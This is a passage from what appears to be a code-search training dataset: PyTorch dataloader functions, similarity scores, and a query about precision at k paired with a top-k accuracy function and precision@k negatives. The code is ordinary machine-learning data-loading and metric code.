pin_memory=hyper_params.cuda)\n\n dataloaders[split] = dl\n\n return dataloaders", "def get_dataloader(\n path='data/interim/data.json',\n train_test_split=0.8,\n batch_size_train=5,\n batch_size_test=5,\n shuffle_train=True,\n perm_images=True,\n transform_train=True,\n transform_test=False,\n class_names=None):\n\n # use our dataset and defined transformations\n if class_names is None:\n dataset = ProdigyDataReader(path, get_transforms(train=transform_train))\n dataset_test = ProdigyDataReader(path, get_transforms(train=transform_test))\n else:\n dataset = ProdigyDataReader(path, get_transforms(train=transform_train),\n object_categories=class_names)\n dataset_test = ProdigyDataReader(path, get_transforms(train=transform_test),\n object_categories=class_names)\n\n # split the dataset in train and test set\n if perm_images:\n indices = torch.randperm(len(dataset)).tolist()\n else:\n indices = list(range(len(dataset)))\n\n len_train = int(len(indices) * train_test_split)\n dataset = torch.utils.data.Subset(dataset, indices[:len_train])\n dataset_test = torch.utils.data.Subset(dataset_test, indices[len_train:])\n\n # define 
training and validation data loaders\n data_loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size_train, shuffle=shuffle_train, num_workers=0,\n collate_fn=collate_fn)\n\n data_loader_test = torch.utils.data.DataLoader(\n dataset_test, batch_size=batch_size_test, shuffle=False, num_workers=0,\n collate_fn=collate_fn)\n\n return [data_loader, data_loader_test]", "def get_val_dataloader(dataset, datadir, datasize, val_bs):\n val_dl = None\n if dataset == 'tinyimagenet':\n if not os.path.exists('./data/tiny-imagenet-200'):\n download_and_unzip('http://cs231n.stanford.edu/tiny-imagenet-200.zip','./data/')\n random_ids = np.random.randint(100000, size=datasize)\n val_indices = random_ids\n\n imagenet_mean = [0.485, 0.456, 0.406]\n imagenet_std = [0.229, 0.224, 0.225]\n\n val_dl = torch.utils.data.DataLoader(\n torchvision.datasets.ImageFolder(datadir,\n transform=transforms.Compose([\n transforms.Resize(32), \n transforms.ToTensor(),\n # Phuong 09/26 change (mean, std) -> same as pretrained imagenet\n transforms.Normalize(mean=imagenet_mean, std=imagenet_std)])),\n #Phuong 09/26 drop_last=False -> True\n batch_size=val_bs, drop_last=True, sampler=SubsetRandomSampler(val_indices))\n \n elif dataset == 'fmnist':\n dl_obj = FashionMNIST_truncated\n transform_val = transforms.Compose([\n transforms.ToTensor(),])\n \n random_ids = np.random.randint(10000, size=datasize)\n val_indices = random_ids\n\n val_ds = dl_obj(datadir, dataidxs=val_indices, train=True, transform=transform_val, download=True)\n val_dl = torch.utils.data.DataLoader(dataset=val_ds, batch_size=val_bs, shuffle=True, drop_last=False)\n \n elif dataset == \"cifar10\":\n dl_obj = CIFAR10_truncated\n transform_val = transforms.Compose([\n transforms.ToTensor(),\n transforms.Lambda(lambda x: F.pad(\n Variable(x.unsqueeze(0), requires_grad=False),\n (4, 4, 4, 4), mode='reflect').data.squeeze()),\n transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n # Phuong 09/26 change (mean, std) -> same as pretrained imagenet\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n # transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n\n ])\n random_ids = np.random.randint(10000, size=datasize)\n val_indices = random_ids\n\n val_ds = dl_obj(datadir, dataidxs=val_indices, train=True, transform=transform_val, download=True)\n val_dl = torch.utils.data.DataLoader(dataset=val_ds, batch_size=val_bs, shuffle=True, drop_last=False)\n\n\n return val_dl", "def _load_data(self):\n if self._name in BALANCE_DATASET:\n _loader = dataset_loaders[self._name]\n xnp, y = _loader()\n\n # Train - Test split\n gen = ShuffleSplit(n_splits=1, random_state=42, test_size=self._test_size).split(xnp)\n train_idx, test_idx = next(gen)\n\n # Train data.\n self.xnp_tr = xnp[train_idx]\n self.y_tr = y[train_idx]\n # Test data.\n self.xnp_ts = xnp[test_idx]\n self.y_ts = y[test_idx]\n\n else:\n _loader = dataset_loaders[self._name]\n xnp, xp, y = _loader()\n # self.xnp, self.xp, self.y = _loader()\n\n # Train - Test split\n gen = ShuffleSplit(n_splits=1, random_state=42, test_size=self._test_size).split(xnp)\n train_idx, test_idx = next(gen)\n\n # Train data.\n self.xnp_tr = xnp[train_idx]\n self.xp_tr = xp[train_idx]\n self.y_tr = y[train_idx]\n # Test data.\n self.xnp_ts = xnp[test_idx]\n self.xp_ts = xp[test_idx]\n self.y_ts = y[test_idx]", "def prepare_demo_dataset(path, reso, batch_size=1):\r\n transform = transforms.Compose([\r\n 
transforms.Resize(size=(reso, reso), interpolation=3),\r\n transforms.ToTensor()\r\n ])\r\n\r\n img_datasets = DemoDataset(path, transform)\r\n dataloader = torch.utils.data.DataLoader(img_datasets, batch_size=batch_size, num_workers=8)\r\n\r\n return img_datasets, dataloader", "def training_start(self, dataloader):\n self.datasize = len(dataloader)", "def get_test_loader(id_list = './data/sample_submission.csv', root_dir = './data/test/'):\n data = HumanProteinDataset(id_list, root_dir, transform = transforms.Compose([\n Rescale((256, 256)), \n ToTensor()\n ]))\n\n indices = np.arange(len(data))\n dataloader_test = DataLoader(data, batch_size=10, num_workers=5)\n\n return dataloader_test", "def train(self, data):\n pass", "def make_data_loader(examples, batch_size=100, shuffle=True):\n x, y = zip(*examples) # makes lists of windows and tags\n x, y = tr.from_numpy(np.array(x)), tr.from_numpy(np.array(y))\n x, y = x.type(tr.LongTensor), y.type(tr.LongTensor) # convert lists to tensors\n train = utdata.TensorDataset(x, y)\n return utdata.DataLoader(train, batch_size, shuffle)", "def create_trainval_dataloaders(params):\n # ----------------Create Dataset objects and Dataloaders----------------\n mr_dataset_train, tokenizer = get_dataset(params, run_mode=\"train\")\n params.vocab_size = tokenizer.get_vocab_size()\n print(\"SystemLog: Vocab size used for training is %d\" % (params.vocab_size))\n print(\"SystemLog: Number of items in the train dataset=%d\" % len(mr_dataset_train))\n sys.stdout.flush()\n # Collate Function pads the sequences to have a uniform length for the entire batch\n mr_dataloader_train = DataLoader(mr_dataset_train, batch_size=params.batch_size,\n shuffle=True, num_workers=params.num_workers, collate_fn=CollateMRSequence(params.architecture))\n\n mr_dataset_valid, _ = get_dataset(params, run_mode=\"valid\")\n print(\"SystemLog: Number of items in the valid dataset=%d\" % len(mr_dataset_valid))\n mr_dataloader_valid = DataLoader(mr_dataset_valid, batch_size=params.batch_size_validation,\n shuffle=False, num_workers=0, collate_fn=CollateMRSequence(params.architecture))\n\n return mr_dataset_train, mr_dataloader_train, mr_dataset_valid, mr_dataloader_valid", "def build_dataloader(cfg, augmentor=None, mode='train', dataset=None, rank=None,\n dataset_class=VolumeDataset, dataset_options={}, cf=collate_fn_train):\n assert mode in ['train', 'val', 'test']\n print('Mode: ', mode)\n\n if mode == 'train':\n batch_size = cfg.SOLVER.SAMPLES_PER_BATCH\n elif mode == 'val':\n batch_size = cfg.SOLVER.SAMPLES_PER_BATCH * 4\n else:\n cf = collate_fn_test # update the collate function\n batch_size = cfg.INFERENCE.SAMPLES_PER_BATCH * cfg.SYSTEM.NUM_GPUS\n\n if dataset is None: # no pre-defined dataset instance\n if cfg.MODEL.TARGET_OPT_MULTISEG_SPLIT is not None:\n dataset_class = VolumeDatasetMultiSeg\n dataset = get_dataset(cfg, augmentor, mode, rank, dataset_class, dataset_options)\n\n sampler = None\n num_workers = cfg.SYSTEM.NUM_CPUS\n if cfg.SYSTEM.DISTRIBUTED:\n num_workers = cfg.SYSTEM.NUM_CPUS // cfg.SYSTEM.NUM_GPUS\n if cfg.DATASET.DISTRIBUTED == False:\n sampler = torch.utils.data.distributed.DistributedSampler(dataset)\n\n # In PyTorch, each worker will create a copy of the Dataset, so if the data\n # is preload the data, the memory usage should increase a lot.\n # https://discuss.pytorch.org/t/define-iterator-on-dataloader-is-very-slow/52238/2\n img_loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=False, collate_fn=cf,\n sampler=sampler, 
num_workers=num_workers, pin_memory=True)\n\n return img_loader", "def dataio_prepare(hparams):\n data_folder = hparams[\"data_folder\"]\n\n train_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"train_data\"],\n replacements={\"data_root\": data_folder}, )\n\n if hparams[\"sorting\"] == \"ascending\":\n # we sort training data to speed up training and get better results.\n train_data = train_data.filtered_sorted(sort_key=\"duration\")\n # when sorting do not shuffle in dataloader ! otherwise is pointless\n hparams[\"train_dataloader_opts\"][\"shuffle\"] = False\n\n elif hparams[\"sorting\"] == \"descending\":\n train_data = train_data.filtered_sorted(\n sort_key=\"duration\", reverse=True)\n # when sorting do not shuffle in dataloader ! otherwise is pointless\n hparams[\"train_dataloader_opts\"][\"shuffle\"] = False\n\n elif hparams[\"sorting\"] == \"random\":\n pass\n\n else:\n raise NotImplementedError(\n \"sorting must be random, ascending or descending\")\n\n valid_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"valid_data\"],\n replacements={\"data_root\": data_folder}, )\n valid_data = valid_data.filtered_sorted(sort_key=\"duration\")\n\n test_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"test_data\"],\n replacements={\"data_root\": data_folder}, )\n test_data = test_data.filtered_sorted(sort_key=\"duration\")\n\n datasets = [train_data, valid_data, test_data]\n\n # Defining tokenizer and loading it\n tokenizer = transformers.BertTokenizer.from_pretrained('bert-base-chinese')\n\n # 2. Define audio pipeline:\n @data_pipeline.takes(\"wav\")\n @data_pipeline.provides(\"sig\")\n def audio_pipeline(wav):\n sig = dataio.read_audio(wav)\n return sig\n\n dataset.add_dynamic_item(datasets, audio_pipeline)\n\n # 3. Define text pipeline:\n @data_pipeline.takes(\"transcript\")\n @data_pipeline.provides(\"wrd\", \"tokens_list\", \"tokens\")\n def text_pipeline(wrd):\n wrd = \"\".join(wrd.split(\" \"))\n yield wrd\n tokens_list = tokenizer(wrd)[\"input_ids\"]\n yield tokens_list\n tokens = numpy.array(tokens_list, dtype=\"int64\")\n yield tokens\n\n dataset.add_dynamic_item(datasets, text_pipeline)\n\n # 4. Set output:\n dataset.set_output_keys(\n datasets,\n [\"id\", \"sig\", \"wrd\", \"tokens\"], )\n\n # 5. 
If Dynamic Batching is used, we instantiate the needed samplers.\n train_batch_sampler = None\n valid_batch_sampler = None\n if hparams[\"dynamic_batching\"]:\n from sampler import DynamicBatchSampler # noqa\n\n dynamic_hparams = hparams[\"dynamic_batch_sampler\"]\n num_buckets = dynamic_hparams[\"num_buckets\"]\n\n train_batch_sampler = DynamicBatchSampler(\n train_data,\n dynamic_hparams[\"max_batch_len\"],\n num_buckets=num_buckets,\n length_func=lambda x: x[\"duration\"],\n shuffle=dynamic_hparams[\"shuffle_ex\"],\n batch_ordering=dynamic_hparams[\"batch_ordering\"], )\n\n valid_batch_sampler = DynamicBatchSampler(\n valid_data,\n dynamic_hparams[\"max_batch_len\"],\n num_buckets=num_buckets,\n length_func=lambda x: x[\"duration\"],\n shuffle=dynamic_hparams[\"shuffle_ex\"],\n batch_ordering=dynamic_hparams[\"batch_ordering\"], )\n\n return (train_data, valid_data, test_data, tokenizer, train_batch_sampler,\n valid_batch_sampler, )", "def prepare_data(self,d):\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n #CONVERT TO FLOAT32\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape((-1,1))\n train = data_utils.TensorDataset(features,target)\n train_loaders[domain] = DataLoader(train, opt.batch_size, shuffle = True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape(-1,1))\n uset = data_utils.TensorDataset(features,target)\n unlabeled_loaders[domain] = DataLoader(uset,opt.batch_size, shuffle = True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n \n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters", "def test_dataloader(self, batch_size: Optional[int] = None) -> DataLoader:\n if self.test is not None:\n dataset = TabularDataset(\n task=self.config.task,\n data=self.test,\n categorical_cols=self.config.categorical_cols,\n continuous_cols=self.config.continuous_cols,\n embed_categorical=(not self.do_leave_one_out_encoder()),\n target=self.target,\n )\n return DataLoader(\n dataset,\n batch_size if batch_size is not None else self.batch_size,\n shuffle=False,\n num_workers=self.config.num_workers,\n pin_memory=self.config.pin_memory,\n )", "def get_each_loader(data_path, batch_size, trn_negnum, shuffle=True, num_workers=0):\n \n dataset = ML_Dataset(data_path, trn_negnum)\n \n if data_path.endswith('trn') == True:\n collate = dataset.train_collate\n else:\n collate = test_collate\n\n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate)\n\n return data_loader", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)\n \n self._results_ = None", "def train(self, train_loader):\n pass", "def load_data(self,split='train'):\n raise NotImplementedError", "def get_dataloader(hp: HParams) \\\n -> Tuple[torch.utils.data.DataLoader, torch.utils.data.DataLoader, int]:\n if hp.data.dataset == \"podcast\":\n dataset = podcast.PODCAST(root=hp.data.path,\n audio_folder=hp.data.audio_folder,\n text_file=hp.data.text_file)\n length = len(dataset)\n train_length = int(0.9 * length)\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_length,\n length - train_length])\n\n # 
https://towardsdatascience.com/7-tips-for-squeezing-maximum-performance-from-pytorch-ca4a40951259\n train_dataloader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n test_dataloader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n return train_dataloader, test_dataloader, int(0.9 * length)\n\n elif hp.data.dataset == \"librispeech\":\n Path(hp.data.path).mkdir(parents=True, exist_ok=True)\n dataset = librispeech.download_data(root=hp.data.path, url=hp.data.url)\n length = len(dataset)\n train_length = int(0.9 * length)\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_length,\n length - train_length])\n train_dataloader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n test_dataloader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n return train_dataloader, test_dataloader, int(0.9 * length)\n\n elif hp.data.dataset == \"ljspeech\":\n Path(hp.data.path).mkdir(parents=True, exist_ok=True)\n dataset = ljspeech.download_data(root=hp.data.path)\n length = len(dataset)\n train_length = int(0.9 * length)\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_length,\n length - train_length])\n train_dataloader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n test_dataloader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n\n return train_dataloader, test_dataloader, int(0.9 * length)\n\n else:\n raise Exception(f\"Dataset {hp.data.dataset} does not exist\")", "def get_dataloader(params, format_name='hdf5', **kwargs):\n \n Provider = get_proper_provider(format_name)(params.modality)\n \n return DataLoader(Provider(params.dataset_path,\n seq_length=params.seq_length),\n batch_size=params.batch_size,\n shuffle=params.is_training,\n num_workers=params.num_workers,\n pin_memory=params.cuda,\n collate_fn=pad_collate)", "def load_data(self,split='train'):\n return load_arrow_data(self.config,split)", "def data_loader(edges,features,y):\n\n\n edge_index = torch.tensor(edges, dtype=torch.long)\n edge_index = edge_index.t().contiguous()\n x = torch.tensor(features.todense(), dtype=torch.float)\n\n y = torch.tensor(y)\n\n data = Data(x=x, edge_index=edge_index, y = y)\n\n return data", "def load_data(data_feeder):\n return data_feeder(BATCH_SIZE,\n SEQ_LEN,\n OVERLAP,\n Q_LEVELS,\n Q_ZERO,\n Q_TYPE)", "def load(self, config, dataset_type, *args, **kwargs):\n base_dataset_name = config.get(\"base_dataset_name\", \"vqa2\")\n base_dataset_config = config.get(\"base_dataset\", config)\n # instantiate base dataset\n # instantiate base dataser builder\n base_dataset_builder_class = 
registry.get_builder_class(base_dataset_name)\n base_dataset_builder_instance = base_dataset_builder_class()\n # build base dataset instance\n base_dataset_builder_instance.build_dataset(base_dataset_config)\n base_dataset = base_dataset_builder_instance.load_dataset(\n base_dataset_config, dataset_type\n )\n if hasattr(base_dataset_builder_instance, \"update_registry_for_model\"):\n base_dataset_builder_instance.update_registry_for_model(base_dataset_config)\n\n # instantiate vinvl dataset\n vinvl_text_processor = config[\"processors\"][\"text_processor\"]\n with open_dict(base_dataset_config):\n base_dataset_config[\"processors\"][\"text_processor\"] = vinvl_text_processor\n base_dataset_config[\"label_map\"] = config[\"label_map\"]\n\n vinvl_dataset = super().load(base_dataset_config, dataset_type, *args, **kwargs)\n vinvl_dataset.set_base_dataset(base_dataset)\n return vinvl_dataset", "def create_dataloader(datafile, dataset_type, batch_size, mechanism, shuffle=False):\n dataset = MazeDataset(datafile, dataset_type)\n assert dataset.num_actions == mechanism.num_actions\n return torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=shuffle, num_workers=0)", "def __init__(self, dataloader):\n self._dataloader = dataloader\n\n self._iterator = iter(self._dataloader)", "def test_cached_dataloader(self):\n\n v = [\"data\", \"target\", \"model_out_sqnet\"]\n\n for data, target in self.train_loader:\n b, c, h, w = data[v[0]].shape\n assert data[v[1]].shape == (b, )\n assert data[v[2]].shape == (b, 100)\n assert data[v[1]].shape == target.shape", "def view(\n self,\n collate_fn: Union[callable, str] = \"batch_of_g_and_y\",\n *args,\n **kwargs\n ):\n # provide default collate function\n if isinstance(collate_fn, str):\n collate_fn = getattr(self, collate_fn)\n\n return torch.utils.data.DataLoader(\n dataset=self,\n collate_fn=collate_fn,\n *args,\n **kwargs,\n )", "def get_test_loader(test_dataset,\n batch_size,\n num_workers=4,\n pin_memory=False):\n data_loader = torchutils.DataLoader(\n test_dataset, batch_size=batch_size, shuffle=True, num_workers=num_workers, pin_memory=pin_memory)\n return data_loader", "def get_loader(file_path, src_word2id, trg_word2id, intent_type=None, intent2index=None, batch_size=1):\n dials = json.load(open(file_path))\n dataset_list = []\n for name in dials.keys():\n val_file = dials[name]\n # build a custom dataset\n dataset = MultiwozSingleDataset(val_file, name, src_word2id, trg_word2id, intent_type, intent2index)\n dataset_list.append(dataset)\n datasets = ConcatDataset(dataset_list)\n # data loader for custome dataset\n data_loader = DataLoader(dataset=datasets,\n batch_size=batch_size,\n shuffle=True,\n num_workers=0,\n collate_fn=collate_fn)\n return data_loader", "def get_dataloader(self, cid, batch_size=None, type=\"train\"):\n dataset = self.get_dataset(cid, type)\n batch_size = len(dataset) if batch_size is None else batch_size\n data_loader = DataLoader(dataset, batch_size=batch_size)\n return data_loader", "def dataloader_vatexEnglish_test(args, tokenizer, subset=\"test\"):\n\n vatexEnglish_dataset = VATEXENGLISH_multi_sentence_dataLoader(\n subset=subset,\n data_path=args.data_path,\n features_path=args.features_path,\n max_words=args.max_words,\n feature_framerate=args.feature_framerate,\n tokenizer=tokenizer,\n max_frames=args.max_frames,\n )\n\n dataloader = DataLoader(\n vatexEnglish_dataset,\n batch_size=args.batch_size_val,\n num_workers=args.num_thread_reader,\n shuffle=False,\n drop_last=False,\n )\n return dataloader, 
len(vatexEnglish_dataset)", "def load(self, handler, name, size, \n batch_size=None, shuffle=False, \n sample_transform=None, batch_transform=None):\n if sample_transform is None:\n sample_transform = self.sample_transform\n if batch_transform is None:\n batch_transform = self.batch_transform\n dataset = DatasetIterator(name, size, handler, \n shuffle=shuffle,\n transform=sample_transform)\n if batch_size is None:\n return dataset\n batches = BatchIterator(dataset, \n batch_size=batch_size, \n transform=batch_transform)\n return batches", "def get_dataloader(\n trainset: VisionDataset,\n testset: VisionDataset,\n batch_size: int,\n n_workers: int,\n) -> Tuple[data.DataLoader, data.DataLoader]:\n trainloader = data.DataLoader(\n trainset,\n pin_memory=(torch.cuda.is_available()),\n num_workers=n_workers,\n shuffle=True,\n batch_size=batch_size,\n )\n testloader = data.DataLoader(\n testset,\n pin_memory=(torch.cuda.is_available()),\n num_workers=n_workers,\n shuffle=False,\n batch_size=batch_size,\n )\n return trainloader, testloader", "def build_dataset(input_reader_config,\n model_config,\n training,\n voxel_generator,\n target_assigner=None):\n generate_bev = model_config.POST_PROCESSING.use_bev\n without_reflectivity = model_config.WITHOUT_REFLECTIVITY\n num_point_features = model_config.NUM_POINT_FEATURES\n out_size_factor = model_config.BACKBONE.layer_strides[0] //model_config.BACKBONE.upsample_strides[0]\n cfg = input_reader_config\n db_sampler_cfg = input_reader_config.DATABASE_SAMPLER\n db_sampler = None\n if len(db_sampler_cfg.sample_groups) > 0:\n db_sampler = build_dbsampler(db_sampler_cfg)\n try:\n u_db_sampler_cfg = input_reader_config.UNLABELED_DATABASE_SAMPLER\n u_db_sampler = None \n if len(u_db_sampler_cfg.sample_groups) > 0:\n u_db_sampler = build_dbsampler(u_db_sampler_cfg)\n except:\n u_db_sampler = None\n grid_size = voxel_generator.grid_size #[352,400]\n feature_map_size = grid_size[:2] // out_size_factor\n feature_map_size = [*feature_map_size, 1][::-1]\n\n prep_func = partial(\n prep_pointcloud,\n root_path = cfg.KITTI_ROOT_PATH,\n class_names = cfg.CLASS_NAMES,\n voxel_generator=voxel_generator,\n target_assigner=target_assigner,\n training=training,\n max_voxels = cfg.MAX_NUMBER_OF_VOXELS,\n remove_outside_points = False,\n create_targets = training,\n shuffle_points = cfg.SHUFFLE_POINTS,\n gt_rotation_noise = cfg.GROUNDTRUTH_ROTATION_UNIFORM_NOISE,\n gt_loc_noise_std = cfg.GROUNDTRUTH_LOCALIZATION_NOISE_STD,\n global_rotation_noise = cfg.GLOBAL_ROTATION_UNIFORM_NOISE,\n global_scaling_noise = cfg.GLOBAL_SCALING_UNIFORM_NOISE,\n global_loc_noise_std = (0.2, 0.2, 0.2),\n global_random_rot_range = cfg.GLOBAL_RANDOM_ROTATION_RANGE_PER_OBJECT,\n db_sampler = db_sampler,\n unlabeled_db_sampler = u_db_sampler,\n generate_bev = generate_bev,\n without_reflectivity=without_reflectivity,\n num_point_features=num_point_features,\n anchor_area_threshold=cfg.ANCHOR_AREA_THRESHOLD,\n gt_points_drop=cfg.GROUNDTRUTH_POINTS_DROP_PERCENTAGE,\n gt_drop_max_keep=cfg.GROUNDTRUTH_DROP_MAX_KEEP_POINTS,\n remove_points_after_sample=cfg.REMOVE_POINTS_AFTER_SAMPLE,\n remove_environment=cfg.REMOVE_ENVIRONMENT,\n use_group_id=False,\n out_size_factor=out_size_factor)\n dataset = KittiDataset(\n info_path = cfg.KITTI_INFO_PATH,\n root_path=cfg.KITTI_ROOT_PATH,\n num_point_features=num_point_features,\n target_assigner=target_assigner,\n feature_map_size=feature_map_size,\n prep_func=prep_func\n )\n return dataset", "def dataset(options):\n pass", "def get_loaders(opt):\n train_samples, 
val_samples = get_train_val_metadata(opt.dataset_dir,\n opt.validation_cities,\n opt.patch_size,\n opt.stride)\n print('train samples : ', len(train_samples))\n print('val samples : ', len(val_samples))\n\n logging.info('STARTING Dataset Creation')\n\n full_load = full_onera_loader(opt.dataset_dir, opt)\n\n train_dataset = OneraPreloader(opt.dataset_dir,\n train_samples,\n full_load,\n opt.patch_size,\n opt.augmentation)\n val_dataset = OneraPreloader(opt.dataset_dir,\n val_samples,\n full_load,\n opt.patch_size,\n False)\n\n logging.info('STARTING Dataloading')\n\n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=opt.batch_size,\n shuffle=True,\n num_workers=opt.num_workers)\n val_loader = torch.utils.data.DataLoader(val_dataset,\n batch_size=opt.batch_size,\n shuffle=False,\n num_workers=opt.num_workers)\n return train_loader, val_loader", "def val_dataloader(self) -> DataLoader:\n loader_val = DataLoader(\n self.dataset_valid, \n batch_size=int(1.5 * self.args.batch_size),\n num_workers=self.args.num_workers,\n pin_memory=self.args.pin_mem,\n drop_last=False\n )\n return loader_val" ]
[ "0.7731121", "0.7497621", "0.72368264", "0.71800596", "0.7143441", "0.7102657", "0.7093028", "0.7014497", "0.6950995", "0.6860976", "0.6830999", "0.67986304", "0.6784964", "0.6782085", "0.67802626", "0.6743672", "0.6729586", "0.6659931", "0.66424596", "0.6627726", "0.6623991", "0.6619608", "0.6609511", "0.6607341", "0.6604726", "0.657813", "0.6576271", "0.65512574", "0.6545428", "0.6526977", "0.65076834", "0.6502126", "0.64992815", "0.6496821", "0.6457729", "0.6421005", "0.6420917", "0.6414877", "0.64116997", "0.6411119", "0.6398087", "0.638023", "0.63724226", "0.6312742", "0.6309674", "0.629974", "0.6297318", "0.6295838", "0.6291873", "0.62912697", "0.6276868", "0.6268379", "0.6264112", "0.6262327", "0.62587154", "0.6255372", "0.6253363", "0.6244811", "0.62433755", "0.6239795", "0.62219775", "0.62109774", "0.62102616", "0.62050986", "0.62050307", "0.62046003", "0.61895186", "0.61859834", "0.61853355", "0.61751187", "0.61688215", "0.61593294", "0.61507237", "0.6146844", "0.61444676", "0.6138137", "0.61034745", "0.6088552", "0.60823107", "0.6081238", "0.6079754", "0.6076254", "0.6068267", "0.6066863", "0.60566676", "0.60515976", "0.60493773", "0.6049095", "0.604589", "0.60440785", "0.6043266", "0.6040748", "0.60291326", "0.6021906", "0.6019508", "0.60100526", "0.59987366", "0.5991421", "0.59879994", "0.59800124", "0.5977117" ]
0.0
-1
Computes the precision for the specified values of k
def accuracy(output, target, topk=(1,)): maxk = max(topk) batch_size = target.size(0) _, pred = output.topk(maxk, 1, True, True) pred = pred.t() correct = pred.eq(target.view(1, -1).expand_as(pred)) res = [] for k in topk: correct_k = correct[:k].view(-1).float().sum(0, keepdim=True) res.append(correct_k.mul_(100.0 / batch_size)) return res
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def precision(gt, pred, k):\n k = min(len(pred), k)\n den = min(len(gt), k)\n return sum([int(pred[i] in gt) for i in range(k)]) / den", "def precision_at_k(r, k):\n assert k >= 1\n r = np.asarray(r)[:k] != 0\n if r.size != k:\n raise ValueError('Relevance score length < k')\n return np.mean(r)", "def precision_at_k(r, k):\n assert k >= 1\n r = np.asarray(r)[:k] != 0\n if r.size != k:\n raise ValueError('Relevance score length < k')\n return np.mean(r)", "def get_precision(self, k=None):\n k = 1 if k is None else k\n precisions = []\n \n for query, answer in tqdm(zip(self.test_queries, self.results)):\n correct_set = self.correct_answers[query]\n n_relevant = 0\n for candidate in answer[:k]:\n if candidate in correct_set:\n n_relevant += 1\n precisions.append(n_relevant / k)\n \n return np.mean(precisions)", "def metric_precision_at_k(pred: list, echt: list, k: int):\n echt_keys = [key for key, _ in echt[:k]]\n return sum([1.0 for key, _ in pred[:k] if key in echt_keys]) / float(k)", "def precision_at_k(model, ratings, k, relevance_func):\n predictions = model.predict_all()\n np.place(predictions, ratings == 0, -np.Inf)\n recommended = predictions.argsort(1)[::, :-k-1:-1]\n \n relevance_per_user = np.take_along_axis(ratings, recommended, 1)\n max_relevance_per_user = (relevance_per_user > 0).sum(1)\n relevance_per_user = relevance_func(relevance_per_user).sum(1)\n\n precision = np.divide(relevance_per_user, max_relevance_per_user)\n \n return np.nanmean(precision)", "def precision_recall_at_k(predictions, k=10, threshold=3.5):\r\n\r\n # First map the predictions to each user.\r\n user_est_true = defaultdict(list)\r\n for uid, _, true_r, est, _ in predictions:\r\n user_est_true[uid].append((est, true_r))\r\n\r\n precisions = dict()\r\n recalls = dict()\r\n for uid, user_ratings in user_est_true.items():\r\n\r\n # Sort user ratings by estimated value\r\n user_ratings.sort(key=lambda x: x[0], reverse=True)\r\n\r\n # Number of relevant items\r\n n_rel = sum((true_r >= threshold) for (_, true_r) in user_ratings)\r\n\r\n # Number of recommended items in top k\r\n n_rec_k = sum((est >= threshold) for (est, _) in user_ratings[:k])\r\n\r\n # Number of relevant and recommended items in top k\r\n n_rel_and_rec_k = sum(((true_r >= threshold) and (est >= threshold))\r\n for (est, true_r) in user_ratings[:k])\r\n\r\n # Precision@K: Proportion of recommended items that are relevant\r\n # When n_rec_k is 0, Precision is undefined. We here set it to 0.\r\n\r\n precisions[uid] = n_rel_and_rec_k / n_rec_k if n_rec_k != 0 else 0\r\n\r\n # Recall@K: Proportion of relevant items that are recommended\r\n # When n_rel is 0, Recall is undefined. 
